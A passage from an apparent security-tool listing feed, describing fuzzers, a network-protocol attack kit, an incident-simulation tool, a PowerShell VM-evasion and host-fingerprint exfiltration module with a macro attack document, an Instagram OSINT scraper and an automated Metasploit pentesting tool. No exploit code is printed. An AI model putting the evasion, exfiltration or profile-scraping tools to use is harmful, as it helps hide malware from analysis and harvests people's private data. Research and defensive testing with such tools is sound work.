DB_NAME

DB_NAME="foobar"

Set this variable to database connection name


DB_TYPE

DB_TYPE="mysql"

The application was developed using a MySQL database. See the typeorm documentation for more database options.


NODE_ENV

NODE_ENV=production

Set this variable to determine node environment


DEV_URL="http://localhost:4200"

Only update if a different port is required


PROD_URL="http://localhost:5000"

Only update if a different port is required


JWT_KEY

JWT_KEY="changeMe"

Set this variable to the JWT secret


JWT_REFRESH_KEY

JWT_REFRESH_KEY="changeMe"

Set this variable to the refresh JWT secret


CRYPTO_SECRET

CRYPTO_SECRET="randomValue"

Set this variable to the Scrypt password.


CRYPTO_SALT

CRYPTO_SECRET="randomValue"

Set this variable to the Scrypt salt.


Empty .env file template
DB_PASSWORD=""
DB_URL=""
DB_USERNAME=""
DB_PORT=3306
DB_NAME=""
DB_TYPE=""
NODE_ENV=""
DEV_URL="http://localhost:4200"
PROD_URL="http://localhost:5000"
JWT_KEY=""
JWT_REFRESH_KEY=""
CRYPTO_SECRET=""
CRYPTO_SALT=""

Create Initial Database Migration
  1. Create the initial database migration
$ npm run migration:init
  1. Run the initial database migration
$ npm run migration:run

Default credentials

A user account is created on initial startup with the following credentials:

  • email: admin@example.com
  • password: changeMe

Upon first login, update the default user password under the profile section.


Built With

Team

The Softrams Bulwark core development team are:



Invoke-Antivm - Powershell Tool For VM Evasion

$
0
0


Invoke-AntiVM is a set of modules to perform VM detection and fingerprinting (with exfiltration) via Powershell.


Compatibility

Run the script check-compatibility.ps1 to check what modules or functions are compatibile with the powershell version. Our goal is to achieve compatibility from 2.0 but we are not there yet. Please run check-compability.ps1 to see what are the current compatiblity issues.


Background

We wrote this tool to unify several techniques to identify VM or sandbox technologies. It relies on both signature and behavioural signals to identify whether a host is a VM or not. The modules are categorized into logical groups: CPU, Execution,Network,Programs. The user can also decide to exfiltrate a fingerprint of the target host to be able to determine what features can be used to identify a sandbox or VM solution.


Purpose

Invoke-AntiVM exists was developed to understand what is the implication of using obfuscation and anti-vm tricks in powershell payloads. We hope this will help Red Teams to avoid analysis of their payload and Blue Teams to understand how to debofuscate a script with evasion techniques. You could either use the main module file Invoke-AntiVM.psd1 or use the singular ps1 script files if you want to reduce the size.


Usage

Usage examples are provided in the following scripts:

  • detect.ps1: this shows an example script of how to call the different tests
  • usage.ps1: this shows basic usage
  • usage_more.ps1: this shows more advanced functions
  • usage_exfil.ps1: this shows how to exfiltrate host information as a json document via pastebin, web or email
  • usage_fingerprint_file.ps1: this shows the exfiltration module and what data is generated in the form of a json document
  • poc_fingerprint_combined.ps1: this shows the fingerprinting module used against online sandboxes
  • output/poc.docm: this shows an example MS Word attack with a macro to call the fingerprinting module (uploaded previously to a server)

The folder pastebin contains a python script:

  • full_fingerprints.py that download all the pastes
  • decode_pastebins.ps1 to decompress and decode the fingerprint documents

You have to make sure you use the same encryption key you used during the exfiltration step. The folder package shows how can you package all the scripts into a singular file for better portability. The folder pastebin shows how to pull automatically and decode the exfiltrated documents from pastebin.


Installation

The source code for Invoke-CradleCrafter is hosted at Github, and you may download, fork and review it from this repository (https://github.com/robomotic/invoke-antivm). Please report issues or feature requests through Github's bug tracker associated with this project.

To install: run the script install_module.ps1


Routopsy - A Toolkit Built To Attack Often Overlooked Networking Protocols

$
0
0


Routopsy is a toolkit built to attack often overlooked networking protocols. Routopsy currently supports attacks against Dynamic Routing Protocols (DRP) and First-Hop Redundancy Protocols (FHRP). Most of the attacks currently implemented make use of a weaponised 'virtual router' as opposed to implementing protocols from scratch. The tooling is not limited to the virtual routers, and allows for further attacks to be implemented in python3 or by adding additional containers.


For further information regarding the usage and such, refer to the Wiki @ https://github.com/sensepost/routopsy/wiki



Fuzzilli - A JavaScript Engine Fuzzer

$
0
0


A (coverage-)guided fuzzer for dynamic language interpreters based on a custom intermediate language ("FuzzIL") which can be mutated and translated to JavaScript.


Usage

The basic steps to use this fuzzer are:

  1. Download the source code for one of the supported JavaScript engines. See the Targets/ directory for the list of supported JavaScript engines.
  2. Apply the corresponding patches from the target's directory. Also see the README.md in that directory.
  3. Compile the engine with coverage instrumentation (requires clang >= 4.0) as described in the README.
  4. Compile the fuzzer: swift build [-c release].
  5. Run the fuzzer: swift run [-c release] FuzzilliCli --profile=<profile> [other cli options] /path/to/jsshell. See also swift run FuzzilliCli --help.

Building and running Fuzzilli and the supported JavaScript engines inside Docker and on Google Compute Engine is also supported.


Hacking

Check out main.swift to see a usage example of the Fuzzilli library and play with the various configuration options. Next, take a look at Fuzzer.swift for the highlevel fuzzing logic. From there dive into any part that seems interesting.

Patches, additions, other contributions etc. to this project are very welcome! However, do quickly check the notes for contributors. Fuzzilli roughly follows Google's code style guide for swift.

It would be much appreciated if you could send a short note (possibly including a CVE number) to saelo@google.com or open a pull request for any vulnerability found with the help of this project so it can be included in the bug showcase section. Other than that you can of course claim any bug bounty, CVE credits, etc. for the vulnerabilities :)


Concept

When fuzzing for core interpreter bugs, e.g. in JIT compilers, semantic correctness of generated programs becomes a concern. This is in contrast to most other scenarios, e.g. fuzzing of runtime APIs, in which case semantic correctness can easily be worked around by wrapping the generated code in try-catch constructs. There are different possibilities to achieve an acceptable rate of semantically correct samples, one of them being a mutational approach in which all samples in the corpus are also semantically valid. In that case, each mutation only has a small chance of turning a valid sample into an invalid one.

To implement a mutation-based JavaScript fuzzer, mutations to JavaScript code have to be defined. Instead of mutating the AST, or other syntactic elements of a program, a custom intermediate language (IL) is defined on which mutations to the control and data flow of a program can more directly be performed. This IL is afterwards translated to JavaScript for execution. The intermediate language looks roughly as follows:

v0 <− LoadInteger '0'
v1 <− LoadInteger '10'
v2 <− LoadInteger '1'
v3 <− LoadInteger '0'
BeginFor v0, '<', v1, '+', v2 −> v4
v6 <− BinaryOperation v3, '+', v4
Reassign v3, v6
EndFor
v7 <− LoadString 'Result: '
v8 <− BinaryOperation v7, '+', v3
v9 <− LoadGlobal 'console'
v10 <− CallMethod v9, 'log', [v8]

Which can e.g. be trivially translated to the following JavaScript code:

const v0 = 0;
const v1 = 10;
const v2 = 1;
let v3 = 0;
for (let v4 = v0; v4 < v1; v4 = v4 + v2) {
const v6 = v3 + v4;
v3 = v6;
}
const v7 = "Result: ";
const v8 = v7 + v3;
const v9 = console;
const v10 = v9.log(v8);

Or to the following JavaScript code by inlining intermediate expressions:

let v3 = 0;
for (let v4 = 0; v4 < 10; v4++) {
v3 = v3 + v4;
}
console.log("Result: " + v3);

FuzzIL has a number of properties:

  • A FuzzIL program is simply a list of instructions.
  • A FuzzIL instruction is an operation together with input and output variables and potentially one or more parameters (enclosed in single quotes in the notation above).
  • Inputs to instructions are always variables, there are no immediate values.
  • Every output of an instruction is a new variable, and existing variables can only be reassigned through dedicated operations such as the Reassign instruction.
  • Every variable is defined before it is used.

A number of mutations can then be performed on these programs:

  • InputMutator: replaces input variables of instructions with different ones to mutate the dataflow of the program.
  • CodeGenMutator: generates code and inserts it somewhere in the mutated program. Code is generated either by running a code generator or by copying some instructions from another program in the corpus (splicing).
  • CombineMutator: inserts a program from the corpus into a random position in the mutated program.
  • OperationMutator: mutates the parameters of operations, for example replacing an integer constant with a different one.
  • and more...

Implementation

The fuzzer is implemented in Swift, with some parts (e.g. coverage measurements, socket interactions, etc.) implemented in C.


Architecture

A fuzzer instance (implemented in Fuzzer.swift) is made up of the following central components:

  • MutationFuzzer: produces new programs from existing ones by applying mutations. Afterwards executes the produced samples and evaluates them.
  • ScriptRunner: executes programs of the target language.
  • Corpus: stores interesting samples and supplies them to the core fuzzer.
  • Environment: has knowledge of the runtime environment, e.g. the available builtins, property names, and methods.
  • Minimizer: minimizes crashing and interesting programs.
  • Evaluator: evaluates whether a sample is interesting according to some metric, e.g. code coverage.
  • Lifter: translates a FuzzIL program to the target language (JavaScript).

Furthermore, a number of modules are optionally available:

The fuzzer is event-driven, with most of the interactions between different classes happening through events. Events are dispatched e.g. as a result of a crash or an interesting program being found, a new program being executed, a log message being generated and so on. See Events.swift for the full list of events. The event mechanism effectively decouples the various components of the fuzzer and makes it easy to implement additional modules.

A FuzzIL program can be built up using a ProgramBuilder instance. A ProgramBuilder provides methods to create and append new instructions, append instructions from another program, retrieve existing variables, query the execution context at the current position (e.g. whether it is inside a loop), and more.


Execution

Fuzzilli uses a custom execution mode called REPRL (read-eval-print-reset-loop). For that, the target engine is modified to accept a script input over pipes and/or shared memory, execute it, then reset its internal state and wait for the next script. This removes the overhead from process creation and to a large part from the engine ininitializaiton.


Scalability

There is one Fuzzer instance per target process. This enables synchronous execution of programs and thereby simplifies the implementation of various algorithms such as consecutive mutations and minimization. Moreover, it avoids the need to implement thread-safe access to internal state, e.g. the corpus. Each fuzzer instance has its own DispatchQueue, conceptually corresponding to a single thread. As a rule of thumb, every interaction with a Fuzzer instance must happen on that instance’s dispatch queue. This guarantees thread-safety as the queue is serial. For more details see the docs.

To scale, fuzzer instances can become workers, in which case they report newly found interesting samples and crashes to a master instance. In turn, the master instances also synchronize their corpus with the workers. Communication between masters and workers can happen in different ways, each implemented as a module:

  • Inter-thread communication: synchronize instances in the same process by enqueuing tasks to the other fuzzer’s DispatchQueue.
  • Inter-process communication (TODO): synchronize instances over an IPC channel.
  • Inter-machine communication: synchronize instances over a simple TCP-based protocol.

This design allows the fuzzer to scale to many cores on a single machine as well as to many different machines. As one master instance can quickly become overloaded if too many workers send programs to it, it is also possible to configure multiple tiers of master instances, e.g. one master instance, 16 intermediate masters connected to the master, and 256 workers connected to the intermediate masters.


Resources

Further resources about this fuzzer:

  • A presentation about Fuzzilli given at Offensive Con 2019.
  • The master's thesis for which the initial implementation was done.
  • A blogpost by Sensepost about using Fuzzilli to find a bug in v8
  • A blogpost by Doyensec about fuzzing the JerryScript engine with Fuzzilli

Bug Showcase

The following is a list of some of the bugs found with the help of Fuzzilli. Only bugs with security impact are included in the list. Special thanks to all users of Fuzzilli who have reported bugs found by it!


WebKit/JavaScriptCore
  • Issue 185328: DFG Compiler uses incorrect output register for NumberIsInteger operation
  • CVE-2018-4299: performProxyCall leaks internal object to script
  • CVE-2018-4359: compileMathIC produces incorrect machine code
  • CVE-2019-8518: OOB access in FTL JIT due to LICM moving array access before the bounds check
  • CVE-2019-8558: CodeBlock UaF due to dangling Watchpoints
  • CVE-2019-8611: AIR optimization incorrectly removes assignment to register
  • CVE-2019-8623: Loop-invariant code motion (LICM) in DFG JIT leaves stack variable uninitialized
  • CVE-2019-8622: DFG's doesGC() is incorrect about the HasIndexedProperty operation's behaviour on StringObjects
  • CVE-2019-8671: DFG: Loop-invariant code motion (LICM) leaves object property access unguarded
  • CVE-2019-8672: JSValue use-after-free in ValueProfiles
  • CVE-2019-8678: JSC fails to run haveABadTime() when some prototypes are modified, leading to type confusions
  • CVE-2019-8685: JSPropertyNameEnumerator uses wrong structure IDs
  • CVE-2019-8765: GetterSetter type confusion during DFG compilation
  • CVE-2019-8820: Type confusion during bailout when reconstructing arguments objects
  • CVE-2020-3901: GetterSetter type confusion in FTL JIT code (due to not always safe LICM)

Gecko/Spidermonkey
  • CVE-2018-12386: IonMonkey register allocation bug leads to type confusions
  • CVE-2019-9791: IonMonkey's type inference is incorrect for constructors entered via OSR
  • CVE-2019-9792: IonMonkey leaks JS_OPTIMIZED_OUT magic value to script
  • CVE-2019-9816: unexpected ObjectGroup in ObjectGroupDispatch operation
  • CVE-2019-9813: IonMonkey compiled code fails to update inferred property types, leading to type confusions
  • CVE-2019-11707: IonMonkey incorrectly predicts return type of Array.prototype.pop, leading to type confusions
  • CVE-2020-15656: Type confusion for special arguments in IonMonkey

Chromium/v8

Duktape
  • Issue 2323: Unstable valstack pointer in putprop
  • Issue 2320: Memcmp pointer overflow in string builtin

JerryScript
  • CVE-2020-13991: Incorrect release of spread arguments
  • Issue 3784: Memory corruption due to incorrect property enumeration
  • CVE-2020-13623: Stack overflow via property keys for Proxy objects
  • CVE-2020-13649 (1): Memory corruption due to error handling in case of OOM
  • CVE-2020-13649 (2): Memory corruption due to error handling in case of OOM
  • CVE-2020-13622: Memory corruption due to incorrect handling of property keys for Proxy objects
  • CVE-2020-14163: Memory corruption due to race condition triggered by garbage collection when adding key/value pairs
  • Issue 3813: Incorrect error handling in SerializeJSONProperty function
  • Issue 3814: Unexpected Proxy object in ecma_op_function_has_instance assertion
  • Issue 3836: Memory corruption due to incorrect TypedArray initialization
  • Issue 3837: Memory corruption due to incorrect memory handling in getOwnPropertyDescriptor

Disclaimer

This is not an officially supported Google product.



SIRAS - Security Incident Response Automated Simulations

$
0
0


Security Incident Response Automated Simulations (SIRAS) are internal/controlled actions that provide a structured opportunity to practice the incident response plan and procedures during a realistic scenarios. the main idea of SIRAS is create an detection-as-a-code testing scenarios to facilitate the blueteam/tabletops scenarios. All smokers of siras make real actions into your AWS and then delete those actions in the same execution.

SIRAS is the incident response friend when you need to test your controls/alerts :)


Why SIRAS?

Currently, the incident detection and response team are developing differents mechanisms to prevent/detect several types of incidents, leaving aside the test stage. Although each alert/automation is tested before implementing it, and it is not constantly monitored. For this, SIRAS proposes an automated test model where it is expected to trigger alerts in a controlled manner to make security incidents simulation.


How to run:

1- ACTIVATE VIRTUALENV

virtualenv siras && source ./siras/bin/activate

2- GET HELP

python3 siras.py -s test

OPTIONS TO RUN (needed)

-s for the "smoker"

-sDescription
allrun all smokers.
testtest siras if works.
sgCreate an open sg into AWS and nuke it.
paMultiple auth failed into vpn paloalto portal (please config "pano_url" into smoker/PanAuthSmoker.py)
auCreate an adminsitrator user into AWS.
acaMultiple auth failed into AWS console portal (please config "account_id" into smoker/awsConsoleAuthSmoker.py)
ctrCreate and delete a cloudtrail trail loggin.
s3pCreate an s3 bucket public.
esbCreate an esb public snapshot (please config your snapshot ID into smoker/EBSPublicSmoker line27)

OPTIONS TO RUN (optional)
-b (to run)Description
Truesave results into s3-bucket.
FalseThis is the default, just print the output into the console

Requeriments
  • Python
  • VirtualEnv
  • AWS Credentials
  • ENV name 'BUCKETS3' to save the logs into that bucket if "true".
  • (If you dont want to use virtualenv) pip to install requeriments.txt

Future Integrations
  • Kubernetes smokers
  • VPC changes
  • EC2 Infected Smoker.
  • GuardDuty Changes.

Request New Modules/Publish

Please feel free to publish or request new modules or use cases, open a ISSUE into the repo or make a PR.




Amlsec - Automated Security Risk Identification Using AutomationML-based Engineering Data

$
0
0


This prototype identifies security risk sources (i.e., threats and vulnerabilities) and types of attack consequences based on AutomationML (AML) artifacts. The results of the risk identification process can be used to generate cyber-physical attack graphs, which model multistage cyber attacks that potentially lead to physical damage.


Installation
  1. Build AML2OWL

This prototype depends on a forked version of the implementation of the bidirectional translation between AML and OWL for the ETFA 2019 paper "Interpreting OWL Complex Classes in AutomationML based on Bidirectional Translation" by Hua and Hein. Clone the repository, compile the projects, and assemble an application bundle of aml_owl:

$ cd aml_models
$ mvn clean compile install
$ cd ../aml_io
$ mvn clean compile install
$ cd ../aml_owl
$ mvn clean compile install assembly:single
  1. Setup the AMLsec Base Directory

Clone this repository, create the application base directory (usually located in the user's home directory), and place the files located in amlsec-base-dir and the assembled AML2OWL JAR (located in aml_owl/target/) there. The AMLsec base directory and the path to the AML2OWL JAR must be set in the configuration file using the keys baseDir and amlToOwlProgram, respectively.

  1. Setup Apache Jena Fuseki

Install and start Apache Jena Fuseki:

$ java -jar <path_to_apache-jena-fuseki-X.Y.Z>/fuseki-server.jar --update
  1. Build AMLsec

Finally, build and start the app by using sbt.

$ sbt "runMain org.sba_research.worker.Main"

Usage

The implemented method utilizes a semantic information mapping mechanism realized by means of AML libraries. These AML security extension libraries can be easily reused in engineering projects by importing them into AML files.

The capabilities of this prototype are demonstrated in a case study. Running this prototype as is will yield the knowledge base (can be accessed via Fuseki), which also includes the results of the risk identification process, and the following pruned cyber-physical attack graph:



Cluster

The prototype utilizes the Akka framework and is able to distribute the risk identification workload among multiple nodes. The Akka distributed workers sample was used as a template.

To run the cluster with multiple nodes:

  1. Start Cassandra:
$ sbt "runMain org.sba_research.worker.Main cassandra"
  1. Start the first seed node:
$ sbt "runMain org.sba_research.worker.Main 2551"
  1. Start a front-end node:
$ sbt "runMain org.sba_research.worker.Main 3001"
  1. Start a worker node (the second parameter denotes the number of worker actors, e.g., 3):
$ sbt "runMain org.sba_research.worker.Main 5001 3"

If you run the nodes on separate machines, you will have to adapt the Akka settings in the configuration file.


Performance Assessment

The measurements and log files obtained during the performance assessment are available upon request.



Osi.Ig - Information Gathering Instagram

$
0
0


  • The InstagramOSINT Tool gets a range of information from an Instagram account that you normally wouldn't be able to get from just looking at their profile

  • The information includes:

  • [ profile ] : user id, followers / following, number of uploads, profile img URL, business enum, external URL, joined Recently, etc

  • [ tags & mentions ] : most used hashtags and mentioned accounts

  • [ email ] : if any email is used any where it'll be displayed

  • [ posts ] : accessability caption, location, timestamp, caption, picture url, etc

    • ( yet not working correctly with posts instagram marks as 'sensitive cotent' )

• How To Install

$ pkg install -y git

$ git clone https://github.com/th3unkn0n/osi.ig.git && cd osi.ig

$ python3 -m pip install requirements.txt


• Usage

$ python3 main.py -u username

$ python3 main.py -h

-p, --post images info highlight


• Update

$ git pull



ToothPicker - An In-Process, Coverage-Guided Fuzzer For iOS

$
0
0


ToothPicker is an in-process, coverage-guided fuzzer for iOS. It was developed to specifically targets iOS's Bluetooth daemon bluetoothd and to analyze various Bluetooth protocols on iOS. As it is built using FRIDA, it can be adapted to target any platform that runs FRIDA.

This repository also includes an over-the-air fuzzer with an exemplary implementation to fuzz Apple's MagicPairing protocol using InternalBlue. Additionally, it contains the ReplayCrashFile.py script that can be used to verify crashes the in-process fuzzer has found.


In-Process Fuzzer

The In-Process Fuzzer works out-of-the-box on various iOS versions (13.3-13.6 tested), but symbols need to be specified. Other iOS versions require adaptions to function addresses. Additionally, it seems like FRIDA's stalker has some problems with the iPhone 8. On newer iPhones that support PAC, the performance significantly suffers from signing pointers. Thus, it is recommended to run this on an iPhone 7.

ToothPicker is built on the codebase of frizzer. However, it has been adapted for this specific application as therefore not compatible with the original version anymore. There exist plans to replace this with a more dedicated component in the future.


Prerequesits:

On the iPhone:

On Linux:

For Arch-based Linux:

# usbmuxd typically comes with libimobiledevice
# but just to be sure, we manually install it as well
sudo pacman -S usbmuxd libimobiledevice python-virtualenv radamsa

# Connect the iPhone to the computer
# Unlock it.
# If a pairing message pops up, click "Trust"
# If no pairing message pops up:
idevicepair pair
# Now there should be the pop up, accept and then again:
idevicepair pair

# In case of connection errors:
sudo systemctl restart usbmuxd
# or pair phone and computer again


# Other useful commands

# To ssh into the iPhone:
# Checkra1n comes with an SSH server listening on Port 44
# Proxy the phone's SSH port to 4444 localport:
iproxy 4444 44
# Connect:
ssh root@localhost -p 4444
# Default password: alpine

# To fetch some device information of the phon e:
ideviceinfo

For Debian Linux:

Almost the same as above. Exceptions:

  • radamsa needs to be installed from the git repository because it is not packaged.
  • The command iproxy requires the additional package libusbmuxd-tools.

For macOS:

Slightly different commands compared to the Arch Linux setup...

brew install libimobiledevice usbmuxd radamsa npm
idevicepair pair
npm install frida-compile
pip3 install frida-tools

On macOS, PacketLogger, which is part of the Additional Tools for Xcode, can decode various packets once the Bluetooth Debug Profile is installed. Moreover, if you open iOS crash logs with Xcode, it will add some symbols.


Setup and Fuzzing

Setup:

  • It is recommended to set up a virtual Python environment for frizzer.
  • Install the required packages by running in the frizzer directory.
  • The projects directory contains an example project to fuzz the MagicPairing protocol.
  • To build the harness compile the general harness and the specialized MagicPairing harness into one file.
  • cd into the harness directory and install frida-compile. Note that this needs to be run in that folder and can be directly installed as user by running npm install frida-compile.
  • Now run frida-compile ../projects/YOUR_PROJECT/YOUR_SPECIALIZED_HARNESS.JS -o ../projects/YOUR_PROJECT/harness.js. As this was installed in npm context it might require running npx frida-compile instead. Each time the harness changes, you need to rerun frida-compile.

Fuzzing:

  • Connect an iOS device to your computer.
  • It is advisable to put the phone in flight mode and turn on the "Do not disturb" feature to limit any other activity on the phone.
  • Run killall -9 bluetoothd to freshly start bluetoothd.
  • Make sure the phone does not connect to other Bluetooth devices.
  • Now, cd back into your project's directory, create the crashlog-directory (mkdir crashes) and run ../../frizzer/fuzzer.py fuzz -p .
  • Yay! Now collect zero days and obtain large amounts of cash from Apple! (Or collect a huge list of useless NULL-pointer dereferences...)

In short, for starting a new project, run:

cd harness
npx frida-compile ../projects/YOUR_PROJECT/YOUR_SPECIALIZED_HARNESS.JS -o ../projects/YOUR_PROJECT/harness.js
cd ../projects/YOUR_PROJECT/
mkdir crashes
frizzer fuzz -p .

You can start with a different seed by using frizzer fuzz --seed 1234 -p ..

Adding new iOS versions:

Currently, different versions of iOS are defined in bluetoothd.js. You can find these with the Ghidra versioning tool given an initial version that has all the required symbols. Note that some of them are not named in the original iOS binary, so ideally start with one that was already annotated before. Each time the bluetoothd.js changes, you need to re-run frida-compile.

Increasing bluetoothd capacities:

iOS crash logs are stored in Settings -> Privacy -> Analytics& Improvements -> Analytics Data. If they contain bluetoothd crashes of the pattern bluetoothd.cpu_resource-*.ips this indicates that the crash was caused due to exceeding resources. They can be increased as follows.

On an iPhone 7, run:

cd /System/Library/LaunchDaemons/
plistutil -i com.apple.jetsamproperties.D10.plist -o com.apple.jetsamproperties.D10.plist.txt
plistutil -i com.apple.jetsamproperties.D101.plist -o com.apple.jetsamproperties.D101.plist.txt

On iPhone SE2, these are in com.apple.jetsamproperties.D79.plist.:

cd /System/Library/LaunchDaemons/
plistutil -i com.apple.jetsamproperties.D79.plist -o com.apple.jetsamproperties.D79.plist.txt

Search for bluetoothd, update the priority to 19 (highest valid priority) and set the memory limit to something very high. Apply the same changes to both files.

<dict>
<key>ActiveSoftMemoryLimit</key>
<integer>24000</integer>
<key>InactiveHardMemoryLimit</key>
<integer>24000</integer>
<key>EnablePressuredExit</key>
<false/>
<key>JetsamPriority</key>
<integer>19</integer>
</dict>

Write the changes back and restart bluetoothd.

plistutil -i com.apple.jetsamproperties.D10.plist.txt -o com.apple.jetsamproperties.D10.plist
plistutil -i com.apple.jetsamproperties.D101.plist.txt -o com.apple.jetsamproperties.D101.plist
killall -9 bluetoothd

Respectively on the iPhone SE2:

plistutil -i com.apple.jetsamproperties.D79.plist.txt -o com.apple.jetsamproperties.D79.plist
killall -9 bluetoothd

Deleting old logs:

iOS stops saving crash logs for one program after the limit of 25 is reached. If loading a crash log with Xcode (via Simulators&Devices), some symbols are added to the stack trace. Once the limit is reached, the logs can either be removed via Xcode or directly on the iOS device by deleting them in the folder /var/mobile/Library/Logs/CrashReporter/.

A12+:

Starting from the iPhone XR/Xs, PAC has been introduced. This requires calling sign() on NativeFunction in FRIDA. While this is a no-op on earlier CPUs, this tremendously reduces speed on newer devices, but is required to make them work at all. We observed that ToothPicker operates at half the speed when using an iPhone SE2 instead of an iPhone 7.


Over-the-Air Fuzzer and Crash Replay

The MagicPairing implementation of the over-the-air fuzzer requires InternalBlue to be installed and can be executed by running python MagicPairingFuzzer.py TARGET_BD_ADDR.

If you want to reproduce crashes, use the ReplayCrashFile.py script, which can take a crash file and initiates an over-the-air connection with a payload based on the crash.



Xerror - Fully Automated Pentesting Tool

$
0
0

Xerror is an automated penetration tool , which will helps security professionals and non professionals to automate their pentesting tasks. Xerror will perform all tests and, at the end generate two reports for executives and analysts.

Xerror provides GUI easy to use menu driven options.Iinternally it supports openVas for vulnerability scanning, Metasploit for exploitation and gives GUI based options after successful exploitation e.g Meterpreter sessoins. Building in python as major.


Xerror build on python2 as a primary language and Django2 as web framework along with, websockets(django channel) on celery server and Redis srver to achieve asynchronization. On front side it supports Djanog default template enging language which is jinga2 and jquery.

How to use this porject:
1.Activate virtual enviroment by following command
souce env/bin/activate
2. Start redis server
service redis-server start
3. start python srver
1. cd xerror 2. python mana.py runserver
4. start celery server
1. cd xerror
2. celery -A xerror worker -l info
5. start msfrpc server
msfrpcd -P 123 -S -a 127.0.0.1
6. start openvas server for default set OMP server credientials to admin@admin 127.0.0.1 9392

You are goog to go

This is xerror Beta version, soon complete version will be uploaded with complete explanation and detail of each step ...












Contact :exploitmee@protonmail.com



UAFuzz - Binary-level Directed Fuzzing For Use-After-Free Vulnerabilities

$
0
0


Directed Greybox Fuzzing (DGF) like AFLGo aims to perform stress testing on pre-selected potentially vulnerable target locations, with applications to different security contexts: (1) bug reproduction, (2) patch testing or (3) static analysis report verification. There are recently more research work that improved directed fuzzing's effectiveness and efficiency (see awesome-directed-fuzzing).


We propose UAFuzz which is a directed fuzzer dedicated to Use-After-Free (UAF) bugs at binary-level by carefully tuning the key components of directed fuzzing to meet specific characteristics of this bug class. UAF bugs appear when a heap element is used after having been freed. Detecting UAF bugs is hard: (1) complexity because a Proof-of-Concept (PoC) input needs to trigger a sequence of three events – alloc, free and use – on the same memory location, spanning multiple functions of the tested program and (2) silence with no segmentation fault.

Overall, UAFuzz has the similar workflow as directed fuzzers with our modifications highlighted in orange along the whole fuzzing process, as shown in the following figure. As we focus on (1) bug reproduction and (2) patch testing applications, it is more likely we have (mostly) complete stack traces of all memory-related UAF events. Unlike existing general directed approaches where targets could be selected independently, we take into account the relationship among targets (e.g., the ordering which is essential for UAFs) to improve the directedness. First, the static precomputation of UAFuzz is fast at binary level. Second, we introduce new ordering-aware input metrics to guide the fuzzer towards targets at runtime. Finally, we triage only potential inputs covering all targets in the expected trace and pre-filter for free inputs that are less likely to trigger the bug.


 

More details in our paper at RAID'20 and our talk at Black Hat USA'20. Thanks also to Sébastien Bardin, Matthieu Lemerre, Prof. Roland Groz and especially Richard Bonichon (@rbonichon) for his help on Ocaml.


Installation

Our tested environment is Ubuntu 16.04 64-bit.

# Install Ocaml and prerequisite packages for BINSEC via OPAM
sudo apt update
sudo apt install ocaml ocaml-native-compilers camlp4-extra opam
opam init
opam switch 4.05.0
opam install merlin ocp-indent caml-mode tuareg menhir ocamlgraph ocamlfind piqi zmq.5.0.0 zarith llvm.6.0.0

# Install Python's packages
sudo pip install networkx pydot

# Checkout source code
git clone https://github.com/strongcourage/uafuzz.git

# Environment variables
export IDA_PATH = /path/to/ida-6.9/idaq
export GRAPH_EASY_PATH=/path/to/graph-easy
cd uafuzz; export UAFUZZ_PATH=`pwd`

# Compile source code
./scripts/build.sh uafuzz

# Help for IDA/UAFuzz interface
./binsec/src/binsec -ida-help
./binsec/src/binsec -uafuzz-help

Code structure

Our fuzzer is built upon AFL v2.52b in QEMU mode for fuzzing and BINSEC for lightweight static analysis (see uafuzz/README.md). We currently use IDA Pro v6.9 to extract control flow graphs (CFGs) and call graph of the tested binary (see ida/README.md).

uafuzz
├── binsec/src
│   └── ida: a plugin to import and process IDA's CFGs and call graph
│   └── uafuzz: fuzzing code
│   │ └── afl-2.52b: core fuzzing built on top of AFL-QEMU
│   │ └── uafuzz_*.ml(i): a plugin to compute static information and communicate with AFL-QEMU
└── scripts: some scripts for building and bug triaging

Application 1: Bug reproduction

We first consider a simple UAF bug. Both AFL-QEMU and even directed fuzzer AFLGo with targets at source-level can't detect this bug within 6 hours, while UAFuzz can detect it within minutes with the help of a Valgrind's UAF report.

# Run AFL-QEMU
$UAFUZZ_PATH/tests/example.sh aflqemu 360
# Run AFLGo given targets at source-level
$UAFUZZ_PATH/tests/example.sh aflgo 360
# Run UAFuzz
$UAFUZZ_PATH/tests/example.sh uafuzz 360 $UAFUZZ_PATH/tests/example/example.valgrind

For real-world programs, we use the UAF Fuzzing Benchmark for our evaluations.

# Checkout the benchmark
git clone https://github.com/strongcourage/uafbench.git
cd uafbench; export UAFBENCH_PATH=`pwd`

We show in details how to run UAFuzz for bug reproduction application of CVE-2018-20623 of readelf (Binutils). The stack traces of this UAF bug obtained by Valgrind are as follows:

    // stack trace for the bad Use
==5358== Invalid read of size 1
==5358== at 0x40A9393: vfprintf (vfprintf.c:1632)
==5358== by 0x40A9680: buffered_vfprintf (vfprintf.c:2320)
==5358== by 0x40A72E0: vfprintf (vfprintf.c:1293)
[6] ==5358== by 0x80AB881: error (elfcomm.c:43)
[5] ==5358== by 0x8086217: process_archive (readelf.c:19409)
[1] ==5358== by 0x80868EA: process_file (readelf.c:19588)
[0] ==5358== by 0x8086B01: main (readelf.c:19664)

// stack trace for the Free
==5358== Address 0x4221dc0 is 0 bytes inside a block of size 80 free'd
==5358== at 0x402D358: free (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
[4] ==5358== by 0x8086647: process_archive (readelf.c:19524)
[1] ==5358== by 0x80868EA: process_file (readelf.c:19588)
[0] ==5358== by 0x8086B01: main (readelf.c:19664)

// stack trace for the Alloc
==5358== Bloc k was alloc'd at
==5358== at 0x402C17C: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
[3] ==5358== by 0x80AD97E: make_qualified_name (elfcomm.c:906)
[2] ==5358== by 0x8086350: process_archive (readelf.c:19435)
[1] ==5358== by 0x80868EA: process_file (readelf.c:19588)
[0] ==5358== by 0x8086B01: main (readelf.c:19664)

1. Preprocessing

The preprocessing script takes the tested binary in x86 and the Valgrind's stack traces as inputs, then generates the UAF bug trace which is a sequence of target locations in the format (basic_block_address,function_name) like the following:

[0] (0x8086ae1,main) -> [1] (0x80868de,process_file) -> [2] (0x808632c,process_archive) -> 
[3, alloc] (0x80ad974,make_qualified_name) -> [4, free] (0x808663a,process_archive) ->
[5] (0x808620b,process_archive) -> [6, use] (0x80ab86a,error)

2. Fuzzing

We provide a fuzzing script's template with several input parameters, for example the fuzzer we want to run, the timeout in minutes and the predefined targets (e.g., extracted from the bug report). For the example above, we use the script CVE-2018-20623.sh and run UAFuzz as:

# Run UAFuzz with timeout 60 minutes
$UAFBENCH_PATH/CVE-2018-20623.sh uafuzz 60 $UAFBENCH_PATH/valgrind/CVE-2018-20623.valgrind

3. Triaging

